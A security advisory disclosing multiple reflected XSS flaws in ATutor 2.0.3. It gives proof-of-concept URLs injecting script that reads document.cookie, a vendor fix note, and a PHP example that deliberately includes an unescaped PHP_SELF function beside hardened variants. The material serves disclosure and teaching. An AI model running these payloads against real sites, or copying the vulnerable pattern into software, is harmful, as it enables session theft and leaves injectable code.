SSCHADV2012-002 - ATutor 2.0.3 Multiple XSS vulnerabilities
Advisory: ATutor 2.0.3 Multiple XSS vulnerabilities
Advisory ID: SSCHADV2012-002
Author: Stefan Schurtz
Affected Software: Successfully tested on ATutor 2.0.3
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
ATutor 2.0.3 is prone to multiple cross-site scripting (XSS) vulnerabilities.
==============
PoC-Exploit
==============
http://[target]/ATutor/themes/default/tile_search/index.tmpl.php/" <script>alert(document.cookie)</script>
http://[target]/ATutor/login.php/index.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/search.php/index.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/password_reminder.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/login.php/jscripts/infusion/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/login.php/mods/_standard/flowplayer/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/browse.php/jscripts/infusion/framework/fss/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/registration.php/themes/default/ie_styles.css" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/about.php/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/themes/default/social/basic_profile.tmpl.php/" <script>alert(document.cookie)</script>/index.php
=====
Solution
=====
Upgrade to ATutor 2.1
================
Disclosure Timeline
================
01-Jan-2012 – vendor informed
01-Jan-2012 – vendor feedback
15-Jan-2012 – no fix available
13-Jul-2012 – fixed by vendor (see comment)
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
http://atutor.ca/view/3/22740/1.html
Comments
greg on :
XSS vulnerabilities resolved. All template links and public forms using $_SERVER['PHP_SELF'] filtered to disallow quotes and HTML.
http://atutor.ca/atutor/mantis/view.php?id=4939
http://atutor.ca/view/3/22740/1.html
http://www.darksecurity.de/advisories/2012/SSCHADV2012-002.txt
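The pattern behind the PoC URLs and the fix note in the comment above, as an added example (not ATutor's code and not part of the advisory): a form action built from $_SERVER['PHP_SELF'] next to two hardened variants, with a check usable as a regression test. The function names and the request values are constructed assumptions.

```php
<?php
declare(strict_types=1);

// Constructed request values (assumption), shaped like the advisory's PoC URLs:
// path segments appended after the script name show up in PHP_SELF,
// while SCRIPT_NAME holds only the path of the script that is executing.
$server = [
    'SCRIPT_NAME' => '/ATutor/login.php',
    'PHP_SELF'    => '/ATutor/login.php/index.php"<script>alert(document.cookie)</script>/index.php',
];

// Vulnerable pattern: PHP_SELF is written into an attribute unescaped, so the
// double quote ends action="..." and the rest is parsed as markup.
function form_action_unsafe(array $server): string
{
    return '<form method="post" action="' . $server['PHP_SELF'] . '">';
}

// Hardened variant 1: do not reflect the client-controlled path suffix at all,
// and still escape for the attribute context.
function form_action_script_name(array $server): string
{
    $action = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form method="post" action="' . $action . '">';
}

// Hardened variant 2: a template that has to keep PHP_SELF escapes quotes and
// angle brackets, so the value cannot leave the attribute.
function form_action_escaped_self(array $server): string
{
    $action = htmlspecialchars($server['PHP_SELF'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form method="post" action="' . $action . '">';
}

// Regression check: rendered output must never contain a literal script tag.
function contains_script_tag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

foreach (['form_action_unsafe', 'form_action_script_name', 'form_action_escaped_self'] as $render) {
    $html = $render($server);
    printf("%-26s script tag in output: %s\n", $render, contains_script_tag($html) ? 'yes' : 'no');
}
```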